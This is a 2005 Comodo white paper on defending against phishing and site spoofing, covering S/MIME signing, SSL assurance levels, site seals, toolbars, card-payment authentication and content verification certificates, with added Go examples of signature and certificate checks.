Digitally signing e-mails involves computing a hash (fingerprint) of the e-mail at the time it is sent and signing that hash with the sender’s private key; recipients check the signature with the matching public key. This allows S/MIME (Secure Multipurpose Internet Mail Extensions) compatible e-mail clients such as Outlook, Eudora and Lotus to check the integrity of the e-mails.

Popular web-based e-mail systems such as AOL, Hotmail, Yahoo! Mail and GMail do not support S/MIME; alternatives such as PGP (Pretty Good Privacy) can be used instead.

Does digitally signing an e-mail prevent identity theft? – No. But again, as with any layered security defense solution, it provides a method for customers to verify e-mail authenticity.

A major barrier to the adoption of S/MIME compliant digital certificates is the control of the keys, especially where a large scale deployment is necessary. Although some providers are now beginning to provide key-server technology to ease the burden of administration and key lifecycle management, the use of PKI has not gained the foothold in the market that it should have. Companies such as VeriSign, Thawte and Comodo offer PKI solutions to enterprises wishing to deploy certificates in volume.

Legislation however is driving the adoption rate forward with new laws now dictating that electronic communications MUST be digitally signed.

The hidden advantage in digitally signing mails is the strength of the audit trail that is created when the digital certificate is issued. Certification Authorities will have records of the application process, providing a stronger case for prosecution.


The disadvantage is that the “from” address, although digitally signed, still needs close inspection, as the domain could still be misleading ([email protected] etc.).
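The signing and verification described above, together with the “from” address caveat, as an added example in Go (not Comodo’s code and not an S/MIME implementation): it signs the hash of a message with Ed25519 from the Go standard library in place of an S/MIME certificate chain, and the knownKeys map stands in for the e-mail address carried in the signer’s CA-issued certificate. The addresses, domains and the look-alike heuristic are constructed assumptions.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"strings"
)

// Message is a constructed, simplified mail: a From header, a body and
// a detached signature. Real S/MIME signs a MIME entity and carries the
// signer's certificate; the integrity check works the same way.
type Message struct {
	From string
	Body string
	Sig  []byte
}

// digest is the fingerprint the text refers to: a SHA-256 hash over the
// From header and the body, so neither can change without the signature
// failing to verify.
func digest(from, body string) []byte {
	h := sha256.Sum256([]byte("From: " + from + "\r\n\r\n" + body))
	return h[:]
}

// Sign produces the signed message with the sender's private key.
func Sign(priv ed25519.PrivateKey, from, body string) Message {
	return Message{From: from, Body: body, Sig: ed25519.Sign(priv, digest(from, body))}
}

// Verdict is what the mail client can tell the user.
type Verdict struct {
	SignerKnown    bool   // a key (certificate) is on file for the From address
	SignatureValid bool   // the digest verifies under that key
	Domain         string // the signing domain, for the user to inspect
}

// Verify looks up the key registered for the From address and checks the
// signature. knownKeys stands in for the e-mail address in the signer's
// CA-issued certificate; it is an assumption of this example.
func Verify(msg Message, knownKeys map[string]ed25519.PublicKey) Verdict {
	v := Verdict{}
	addr := strings.ToLower(msg.From)
	pub, ok := knownKeys[addr]
	if !ok {
		return v
	}
	v.SignerKnown = true
	v.SignatureValid = ed25519.Verify(pub, digest(msg.From, msg.Body), msg.Sig)
	if at := strings.LastIndex(addr, "@"); at >= 0 {
		v.Domain = addr[at+1:]
	}
	return v
}

// LookalikeDomain is the caveat from the text in code: a valid signature
// proves the mail came from whoever controls the From address, not that
// the address belongs to the expected organisation. This simple heuristic
// flags a different domain that merely contains the expected first label.
func LookalikeDomain(domain, expected string) bool {
	d, e := strings.ToLower(domain), strings.ToLower(expected)
	if d == e {
		return false
	}
	label := strings.SplitN(e, ".", 2)[0]
	return strings.Contains(d, label)
}

func main() {
	// Constructed keys: one for the bank, one for an impostor domain.
	bankPub, bankPriv, _ := ed25519.GenerateKey(rand.Reader)
	badPub, badPriv, _ := ed25519.GenerateKey(rand.Reader)
	keys := map[string]ed25519.PublicKey{
		"alerts@examplebank.com":          bankPub,
		"alerts@examplebank-security.com": badPub,
	}
	genuine := Sign(bankPriv, "alerts@examplebank.com", "Your statement is ready.")
	fmt.Printf("genuine:   %+v\n", Verify(genuine, keys))

	genuine.Body += " Please re-enter your password."
	fmt.Printf("tampered:  %+v\n", Verify(genuine, keys))

	phish := Sign(badPriv, "alerts@examplebank-security.com", "Please confirm your details.")
	v := Verify(phish, keys)
	fmt.Printf("lookalike: %+v lookalike=%v\n", v, LookalikeDomain(v.Domain, "examplebank.com"))
}
```

The third case is the point of the caveat: the impostor’s signature verifies perfectly against the impostor’s own key, so the client must surface the signing domain and leave the comparison with the expected domain to a check like LookalikeDomain, or to the user.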

User Education – General Security Awareness

One of the most important areas, yet one of the most difficult to address on the large scale necessary to defeat the problem, is user education. Unfortunately, advice given to user groups will sometimes be used by phishers to trick users into an even deeper false sense of security. It is therefore paramount that enterprises and security service providers work together to ensure that baseline products and services (i.e. the browser and the underlying systems) are architected to provide security to users without the need for mass user education.

The choice of Internet Browser

Within the marketing campaigns of Internet browser providers, online safety and security is seen as a major concern. With the growing choice of browsers, security is seen as one of the major decision-making criteria upon which users choose how to browse the Internet.

Server/Enterprise

There is an ever increasing portfolio of managed services and server-side identity assurance tools. These tools are available both for use by end users/customers and, more appropriately, by enterprises, whereby proactive integration into their web-based service delivery architecture together with increased end user education can limit the number of attack vectors aimed at their service. Some tools are free, some are paid for and some are absolutely essential (legislation such as HIPAA, SoX and GLB driving their usage). Most operate across all browser platforms, but again, as with the previous set of client-side solutions, several tools are required as part of a defense in depth approach.

Additional Server side solutions are discussed in the following sections.

• Client Authentication certificates

• SSL Certificates

• Site Identity Assurance Seals

• Browser enhancements – Toolbars

• Managed Identity Assurance Services

• Content Verification Certificates

Client Authentication Certificates

Client authentication tokens such as digital certificates, USB keyfobs/smartcards etc. do provide more robust two-factor authentication methods to validate users entering a site, protecting a real site from false users, but how are real users protected from false sites? If the site is a false ‘spoofed’ site then no matter what token is used or password entered the answer will always be ‘yes, please enter’!

It is doubtful that the false site would gain any valuable information which would be useful in an attack against the enterprise it spoofs, but users believing they are on a legitimate site could become victims of identity theft themselves having been fooled by a false authentication login process.


Secure Socket Layer Certificates.

Established by Netscape in 1994, the SSL protocol is now widely accepted as a method of providing confidentiality, authentication and integrity for on-line transactions. Companies such as VeriSign and Comodo deliver high assurance certificates to individuals and organizations following a subscriber authentication process that includes verification of the organization’s existence, the organization’s right to use the domain name included within the certificate, and the authority of the requester to obtain a certificate on behalf of the organization. The use of SSL certificates is a critical building block for secure electronic commerce and one of the most ubiquitous uses of public key infrastructure (PKI). SSL certificates provide three security services – confidentiality, authentication and integrity – enabling a user to:

• Securely communicate with a web site – Information which the user then provides cannot be intercepted in transit (confidentiality) or altered without detection (integrity)

• Verify that the site is actually the company’s web site and not an impostor’s site (authentication)

For example, an SSL certificate with the organizational name “ABC Software Inc.” is intended to provide assurance that the Web site being viewed (e.g. www.abcsoftware.com) is actually an ABC Software Inc. Web site (and not a “spoofed” site created specifically by another unrelated entity to trick unsuspecting web surfers into doing business with someone pretending to be ABC Software Inc.).

Why is this important? A domain name URL (uniform resource locator) is equivalent to a telephone number. It is assigned to a paying customer (organization or individual) for the period of time it is registered.

The domain name system was designed to support open-systems information flow. While there are restrictions on certain types of domains (e.g. .mil is restricted to military entities, .fr is restricted to organizations physically located in France), there are no such restrictions on .com, .org, .net and others. To register for these types of domains the individual or organization need only pay an annual fee. There is no requirement for registrars to verify the accuracy of the information provided.

The importance of providing assurance to a growing Internet population of more than 1 Billion individuals is paramount. The architecture of leading Internet browsers available from Microsoft®, Netscape®, Opera® and others has been constructed in such a way as to provide assurance through the use of simple icons (in the form of locks and keys). However, changes in the SSL certificate marketplace pose a security risk with a potential threat to consumer confidence in the security of online commerce.

Authentication of an organization

Providers of low assurance SSL certificates do not perform all the necessary checks, choosing instead to offer a reduced-cost, rapid-fulfillment model. These lower-assurance SSL providers provide confidentiality and integrity, but not authentication. This is in direct conflict with accepted industry practice and serves as a source of confusion for Internet users. Whereas in the past it was acceptable merely to rely on the lock symbol, users must now examine and understand the contents of the SSL certificate in order to distinguish between the varying levels of assurance. In some cases users may need to refer back to the CPS (Certificate Practice Statement) to be able to understand the level of assurance provided.

Industry standards for subscriber registration require that a certification authority (CA) maintains controls to provide reasonable assurance that:

• Subscribers are properly identified and authenticated

• Subscriber certificate requests are accurate, authorized and complete.

A certification authority’s code of practice is detailed in a CPS (Certificate Practice Statement) or disclosed within the CA’s published certificate policy (CP). There are three fundamental verification steps necessary to be able to issue an SSL certificate to an organization:

• Domain ownership – Does the organization or individual have the right to use the Domain identified on the certificate.

• Confirmation of legal status – Is the organization a legal entity.

• Confirmation of the requestor’s authorization – Does the individual making the request have authorization from the organization on whose behalf they are making the request.

The importance of the validation steps is identified in the risk table below. In general, an Internet user incurs a higher risk if verification steps are not performed.

In each example scenario, the failure to complete the specified checks could expose:

• Unsuspecting Internet users to direct financial loss due to fraud.

• The legitimate organization to direct financial loss due to fraud, undue business risk, loss of productivity, bad public relations or legal action.

• The certification authority to undue business risk, bad public relations or legal action


Can SSL on its own provide identity assurance? – No. With several alternative assurance levels and no differentiation methods available to the end user, it is not possible to see which level is appropriate for which Internet activity.

Internet Explorer does not differentiate between high and low assurance certificates. Even more recent browsers like Firefox, although displaying the signing authority, require in-depth analysis of the certificate itself.
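What a client could check automatically instead of asking the user to read the certificate, as an added example in Go using the standard crypto/x509 package (not Comodo’s or any browser’s code): it reports whether the subject carries a verified Organization, whether the certificate names match the visited host, and whether it is within its validity period. The two certificates are self-signed in memory so the program runs offline, and the rule ‘no Subject Organization means domain-only validation’ is this example’s assumption about how low-assurance issuers fill the certificate.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// Assessment is what a client could show instead of a bare lock icon.
type Assessment struct {
	Level           string // "organization-validated" or "domain-only"
	Organization    string // subject O field, empty when absent
	Issuer          string // the signing CA's organisation name
	HostnameMatches bool   // certificate names include the visited host
	ValidNow        bool   // within the notBefore/notAfter window
}

// Assess reads the fields a user is told to inspect by hand. The rule
// that a certificate without a Subject Organization was issued without
// organisation checks is an assumption of this example: low-assurance
// issuers validate the domain only and leave O empty.
func Assess(cert *x509.Certificate, host string, now time.Time) Assessment {
	a := Assessment{Level: "domain-only", Issuer: strings.Join(cert.Issuer.Organization, ", ")}
	if len(cert.Subject.Organization) > 0 {
		a.Level = "organization-validated"
		a.Organization = cert.Subject.Organization[0]
	}
	a.HostnameMatches = cert.VerifyHostname(host) == nil
	a.ValidNow = !now.Before(cert.NotBefore) && !now.After(cert.NotAfter)
	return a
}

// makeCert builds a self-signed certificate in memory so the example
// runs offline; org may be empty to imitate a domain-only certificate.
func makeCert(org string, dnsNames []string) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: dnsNames[0]},
		DNSNames:     dnsNames,
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	if org != "" {
		tmpl.Subject.Organization = []string{org}
		tmpl.Subject.Country = []string{"US"}
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

func main() {
	// Constructed certificates: the genuine "ABC Software Inc." site and a
	// domain-only certificate for a look-alike host.
	ov, err := makeCert("ABC Software Inc.", []string{"www.abcsoftware.com", "abcsoftware.com"})
	if err != nil {
		panic(err)
	}
	dv, err := makeCert("", []string{"www.abcsoftware-login.test"})
	if err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", Assess(ov, "www.abcsoftware.com", time.Now()))
	fmt.Printf("%+v\n", Assess(dv, "www.abcsoftware-login.test", time.Now()))
}
```

Both certificates would earn a lock icon in a browser of the period; only the Level and Organization fields of the assessment tell the two apart, which is exactly the inspection the text says users are currently left to do themselves.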

EXAMPLE SCENARIO – RISK OR THREAT POSED

• No authentication of the organization by the CA, or no check of the applicant’s right to use the domain name

Risk: A malicious individual operating a spoofed web site tries to masquerade as an existing organization, thus deceiving Internet users into believing that the individual’s web site is operated under the auspices of an existing organization whose name is included in the SSL certificate. This then creates a false level of trust by association between the malicious individual and the legitimate organisation.

• No check of the organization’s existence by the CA

Risk: A malicious individual could pretend to be an organization even though no such organization exists (i.e. the articles of incorporation or business documents have not been registered with the appropriate government body).

• No check of the applicant’s identity and authority to request a certificate for the organization by the CA

Risk: A malicious individual who is not authorized by the organisation could obtain an SSL certificate bearing the organization’s name, allowing the malicious individual to masquerade as the organization.


Site Identity Assurance Tools

SSL providers (Certification Authorities) also provide Site Identity Assurance Tools in the form of site seals, for example:-

Users then either point at the logo to gain additional site information and assurance (In the case of Comodo’s Point to Verify Trustlogo technology) or click on the logo to open a new window to gain that assurance. The windows will have https connections with trusted third party databases (Not controlled by the site) to present users with appropriate site identity credentials.

Can a site seal provide identity assurance? – Yes. Positive identity assurance can be provided on the assumption that the site seal cannot be spoofed and users are educated on what specifically to look for.

However, as has been shown in the previous sections, graphics and content can be spoofed by phishers, meaning that other security measures must be included, for example a ‘real time’ date/time stamp displayed as part of the assurance data window etc.

As with all solutions presented in this section, the overall effectiveness of the solution is more apparent when used in combination with other solutions.

Toolbars

Toolbars come in a variety of shapes and sizes, from simple navigation aids to security enhancements such as removing pop-ups. Toolbars backed by databases have gained popularity; however, the effectiveness of any such solution is dependent on the database used, its coverage and the depth of information on each URL.

The Internet Explorer platform, currently used by 90-95% of the Internet community, is far too flexible, allowing ‘true’ toolbars to be switched off and replaced with spoofed toolbars on the sites themselves, not only negating the value of the toolbar solution in the first place but actually providing additional ‘false assurance’ to a potential victim!

Phishing attacks also use ‘real’ sites to legitimize the false site, opening a pop-up window in front of a legitimate business’s site (see page 6), and unless the toolbar is included within the pop-up window users are unable to determine which site the pop-up is hosted from.

Can a toolbar powered from a comprehensive URL database provide identity assurance? – Yes. Positive identity assurance can be provided if the toolbar cannot be disabled (and therefore spoofed). Users are able to make an informed decision on the legitimacy of a web site covered by the database; sites not in the toolbar database are not covered.

Providers     Level     Seal   Price
Comodo        128-bit   Yes    $69
DigiCert      128-bit   Yes    $99
SSL.com       128-bit   Yes    $99
XRampSSL      128-bit   Yes    $128
EnTrust       128-bit   Yes    $149
QualitySSL    128-bit   Yes    $159
GeoTrust      128-bit   Yes    $159
Thawte        128-bit   Yes    $199
GlobalSign    128-bit   Yes    $214
Betrusted     128-bit   Yes    $349
VeriSign      128-bit   Yes    $895



Managed Identity Assurance Services

Personalizing communications – for example including the customer’s name or a masked credit card number (**** **** **** 4343) rather than ‘Dear Sir’ or ‘Dear Valued Customer’ – is a popular method of providing e-mail assurance. Two popular web-based managed services take this one stage further, presenting personal information to the user during a transaction.

VERIFIED by VISA

Whenever you make a purchase (1) at a merchant that supports the Verified by Visa program, the merchant requests the central Visa Directory Server (2) to check with your issuer if your card is enrolled to the service.

If the issuer indicates that you are enrolled, then your browser is automatically redirected (3) to the issuer’s ACS (Access Control Server) address, along with the relevant purchase information.

The ACS will now present a Verified by Visa receipt on your browser (4). The receipt includes purchase details, and you are prompted to type your secret password. Once confirming the receipt with your password and passing authentication (5), the issuer will digitally sign the receipt and redirect your browser to the merchant’s Thank You page (6).

MASTERCARD SECURECODE

When purchasing at a merchant that supports the SPA program (1), a receipt will pop up at the checkout page (2) presenting the purchase details. At this point you are also asked to authenticate with a secret password (3).

The information is sent to the server (4), which verifies your identity and generates a unique authentication code. It returns the UCAF code and your MasterCard number, expiry date and name-on-card (5). These are automatically populated by the wallet (6) at the checkout page.

The merchant will now perform a regular authorization request, which includes the unique authentication code (7). When it reaches your card issuer, a UCAF validity check is performed to assure that the transaction is genuine.

Are these identity assurance methods foolproof against a man-in-the-middle attack? – No. Without identity assurance methods to verify either the identity of the site or its contents, man-in-the-middle attacks can still be launched.

If ‘Bad Bob’ sits in the middle hosting a completely spoofed web site, he is able to piggyback on the ‘real’ Verified by Visa or the real ‘MasterCard SecureCode’ process and pass selective information to the cardholder.

Bad Bob does not need to be enrolled in any of the VbV programs; he just needs to know a provider that is. There is no way for a cardholder to validate whether he is on Bad Bob’s site when he begins the process – there is no assurance of the initial site and therefore no assurance in the process. Effectively, Bad Bob can proxy information back and forth to the customer as he sees fit, monitoring the information and gaining user passwords in the process.


Why is it possible to launch this type of attack?

This is possible today because there is as yet no accepted verification method to ensure that the content of a browser window is allowed to exist on the web page on which it appears.

(As easy as cut and paste)

End users are not able to ascertain whether the content actually relates to the site – anyone can cut and paste! Therefore graphics passed by Bad Bob through his site could convince an end user that he was a legitimate business.

And so, returning to the preface summary – ‘don’t believe anything you see’ – how is it possible to protect the content of a web page?

Content Verification

For content to become ‘verifiable’ by the user it must be:-

1) Suitably complex such that it cannot easily be spoofed (No cut and paste possibilities)

2) Directly linked (bound) to the web page (URL and/or IP) upon which it is to be displayed

3) Given a validity period related to its usage.

‘VerificationEngine’ the patented browser plug-in for Internet Explorer from Comodo allows users to verify that a digitally signed element of content can exist on an approved web page.

For example, which website below is legitimate and which is not? (Bearing in mind all the attack vectors discussed in previous sections.)

(Figure: Web Site ‘A’ / Web Site ‘B’)

A verification process (a process that is initiated by the user and not the web server) allows any digitally signed content bound to a specific URL/IP to be rendered onto the display in a different way to all other ‘non-verified’ elements, easily highlighting trusted elements.

So in the example of the web site above, the ‘real’ web site would display trusted logos highlighted, whereas the ‘spoofed’ site would not be able to and would display all elements as ‘un-trusted’. This is shown in more detail in the summary section.

Can “Content Verification” provide identity assurance? – Yes. The other advantage of content verification is that other tools such as site seals, toolbars, managed services, brands, logos etc. can also all be protected, and extending the protection from graphics to HTML allows for trusted navigation, trusted login boxes and trusted pay/buy buttons.


What are Content Verification Certificates?

Content Verification Certificates (CVC) facilitate the verification of “web page content”. As an X.509 compliant certificate type, CVCs are created, distributed and revoked using proven PKI (Public Key Infrastructure) methods to provide the highest level of security for web page content. They facilitate the deployment of verified login boxes, verified navigation panes, verified trade marking/branding and verified accreditation/association. These examples are shown below, where content is either displayed in the ‘raw’ untrusted state as a graphic or HTML, or as a trusted element extracted from the certificate.
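The three properties listed earlier (hard to copy, bound to a page, time-limited) and the certificate described above, as an added Go example rather than Comodo’s actual CVC format, which is X.509: the content hash, bound URL and validity window are signed with Ed25519 by a constructed ‘validation authority’ key, and the viewer-side check rejects the same content when it is copied to another host, altered, expired or signed by anyone else. The names, URLs and logo bytes are constructed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"net/url"
	"strings"
	"time"
)

// CVC is a constructed stand-in for a content verification certificate:
// the hash of the protected element, the page it is bound to, a validity
// window and the validation authority's signature over those fields.
// Comodo's CVCs are X.509 certificates; this struct is not their format.
type CVC struct {
	ContentSHA256 [32]byte
	BoundURL      string
	NotBefore     time.Time
	NotAfter      time.Time
	Signature     []byte
}

// tbs is the byte string the authority signs ("to be signed"): every
// field that the verifier later relies on.
func (c CVC) tbs() []byte {
	return []byte(fmt.Sprintf("%x|%s|%d|%d",
		c.ContentSHA256[:], c.BoundURL, c.NotBefore.Unix(), c.NotAfter.Unix()))
}

// Issue is the validation authority's step: bind content to a page for a
// period and sign the binding.
func Issue(vaPriv ed25519.PrivateKey, content []byte, boundURL string, notBefore, notAfter time.Time) CVC {
	c := CVC{ContentSHA256: sha256.Sum256(content), BoundURL: boundURL, NotBefore: notBefore, NotAfter: notAfter}
	c.Signature = ed25519.Sign(vaPriv, c.tbs())
	return c
}

// Result is the verdict the viewer would render: trusted or not, and why.
type Result struct {
	Trusted bool
	Reason  string
}

// VerifyContent is the client-side check initiated by the user, not the
// web server: signature first, then content hash, validity period and
// the binding between the certificate and the page being viewed.
func VerifyContent(c CVC, vaPub ed25519.PublicKey, content []byte, pageURL string, now time.Time) Result {
	if !ed25519.Verify(vaPub, c.tbs(), c.Signature) {
		return Result{false, "signature not from the validation authority"}
	}
	if sha256.Sum256(content) != c.ContentSHA256 {
		return Result{false, "displayed content differs from certified content"}
	}
	if now.Before(c.NotBefore) || now.After(c.NotAfter) {
		return Result{false, "outside validity period"}
	}
	bound, err1 := url.Parse(c.BoundURL)
	page, err2 := url.Parse(pageURL)
	if err1 != nil || err2 != nil || bound.Scheme != page.Scheme ||
		!strings.EqualFold(bound.Hostname(), page.Hostname()) {
		return Result{false, "content is not bound to this page"}
	}
	return Result{true, "verified"}
}

func main() {
	vaPub, vaPriv, _ := ed25519.GenerateKey(rand.Reader)
	logo := []byte("constructed logo bytes")
	now := time.Now()
	cert := Issue(vaPriv, logo, "https://www.abcsoftware.com/", now.Add(-time.Hour), now.Add(24*time.Hour))

	// The logo on a page of the site it was issued for.
	fmt.Println(VerifyContent(cert, vaPub, logo, "https://www.abcsoftware.com/login", now))
	// The same logo and certificate cut and pasted onto another host.
	fmt.Println(VerifyContent(cert, vaPub, logo, "https://www.abcsoftware-login.test/", now))
	// The certificate presented on the right page after it has expired.
	fmt.Println(VerifyContent(cert, vaPub, logo, "https://www.abcsoftware.com/", now.Add(48*time.Hour)))
}
```

The order of the checks matters: the signature is verified before any field of the certificate is trusted, so an attacker who edits the bound URL or the validity window in a copied certificate fails at the first step rather than at the check whose input he altered.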

(Figure: web page prior to verification / web page during verification)

VerificationEngine™ – A free tool for Internet Explorer.

VerificationEngine enhances the capabilities of the ubiquitous Internet Explorer web browser to that of a true trusted business tool – verifying SSL connectivity and protecting the browser toolbars whilst at the same time extracting and displaying the contents of any valid CVCs. As has been shown in the previous sections, the only way to combat fraudulent/spoofed websites is to ratify by a test that site elements are verified; this requires the verification to take place outside of the browser so that the fraudster can have no input into the results. VerificationEngine will indicate that the site is legitimately able to display logos such as credit card icons (for online purchasing) and that the site is secured by SSL. It does so in a highly visible manner that is intuitive, fast and user customizable for even higher levels of security.

Content Verification Certificates allow verification of web site content. The content requiring protection is digitally bound within an X.509 certificate also holding location information. A compliant viewer is then able to extract the information and display it through web browser independent techniques.

Figure callouts – elements that VerificationEngine can display as trusted:

• External event indicator

• Protection of trademarks and identity – verification of the ownership of the URL and trademark

• Secure download button allowing code to be downloaded from the URL

• Secure LOGIN – signed HTML ensuring the correct routing of username and password

• Signed HTML (links) allowing trusted navigation to alternative parts of the site

• Secure 3rd-party trademark or site seal verifying a link between the site URL and the identity behind the logo

Web page contents are extracted from the CVC certificates and pulled through the Content Guard by VerificationEngine. Any overlap of content (even by a single pixel) voids the verification process.

(Figure layers: Verified Content Layer; Content Guard)

Company information, URL and content are supplied to a Validation Authority, who validates all aspects of the submission. Signed content in the form of a CVC is then returned to the company to be displayed on the company web site. Trusted content can be viewed by customers with the VerificationEngine™ viewer.


SUMMARY

‘Don’t believe anything you see’ was the conclusion to the Preface. But in saying this, how then will the Internet economy survive in the long term? Billions of dollars of trade move across the Internet every day, yet as more organizations provide greater online access for their customers, professional criminals see the Internet as a potential goldmine of opportunities. As the Internet evolves with greater functionality and a greater number of services added to it, so the number of potential loopholes increases. In January 2005 we’ve now seen whole web sites copied by attackers, and automated bots cloning pages and spawning spam to lure victims. We’ve seen malware attacks featuring viruses attached to JPEG files and advanced Trojan/virus phishing techniques, with the malware lying dormant on a system until a banking site is identified and then keylogging critical data. Attacks are now also running scripts to alter bookmarks, and so the list goes on.

By understanding the tools and technologies criminals use within their arsenal, businesses and their customers can take a proactive stance in defending against future attacks. By applying a multi-tiered approach to their security model (client-side through managed services to server-side) enterprises can easily manage their protection technologies against today’s and tomorrow’s threats. In the end, identity assurance on the Internet relies heavily on being able to “verify” content being displayed. Browser providers hold the key to the technical solutions necessary to fuel the success of the Internet and as such provide the means to solve many of the problems seen today. Enterprises have a duty to educate their end users, whilst continually assessing and implementing additional security technologies into their on-line services.

The final solution will be a multilayered approach both on the client machines and on web servers themselves. Browser providers should look to the following areas during future developments of the browser architecture:

• To provide clear differentiation between high assurance and low assurance SSL communication sessions.

• To provide real time access to globally recognized trusted third-party databases that provide web site identity assurance.

• To provide content verification techniques facilitating brand protection, legitimate logo usage and identity assurance.

In the interim period security innovators, Certification Authorities and service providers need to create/develop tools, technologies and services to plug these holes. By solving these issues the Internet will evolve into the secure communications mechanism it was meant to be, providing a safe global trading environment for enterprises of all sizes.

Comodo provides a complete range of browser enhancement tools, endpoint security solutions, managed services and security technologies to address many of the areas highlighted within this paper. For more information on specific solutions please refer to the following sites.

CVC - Content Verification Certificates - http://www.contentverification.com

Vengine - Verification Engine - High Assurance SSL and CVC viewer - http://www.vengine.com

Trustlogo - Real time web site identity assurance for businesses - http://www.trustlogo.com

TrustToolbar - Real time web site identity assurance for consumers - http://www.trusttoolbar.com

IDAuthority - Mapping the physical world to the virtual world - http://www.idauthority.com

SSL - High Assurance SSL/TLS web server certificates - http://www.enterprisessl.com

Security - Security solutions, cryptographic and encryption solutions - http://www.comodo.com

Anti Virus - Endpoint Security Solutions, AntiVirus, AntiSpam, Firewall - http://www.trustix.com

© 2005 Comodo Inc. All rights reserved. No part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher.

Steve Roylance - Technical Marketing Director - Comodo

Seemant Sehgal - Security Analyst - Comodo

Comodo

US Headquarters 525 Washington Blvd, Jersey City,

NJ 07310, USA Tel Sales: +1 800 772 5185 Fax Sales: +1 646 442 3760

Canadian Tel Sales: +1 877 80 32 556 [email protected]

Comodo EMEA Headquarters

New Court, Regents Place, Regent Road Manchester, M5 4HB, United Kingdom

Tel Sales: +44 (0) 161 874 7070 Fax Sales: +44 (0) 161 877 1767

[email protected]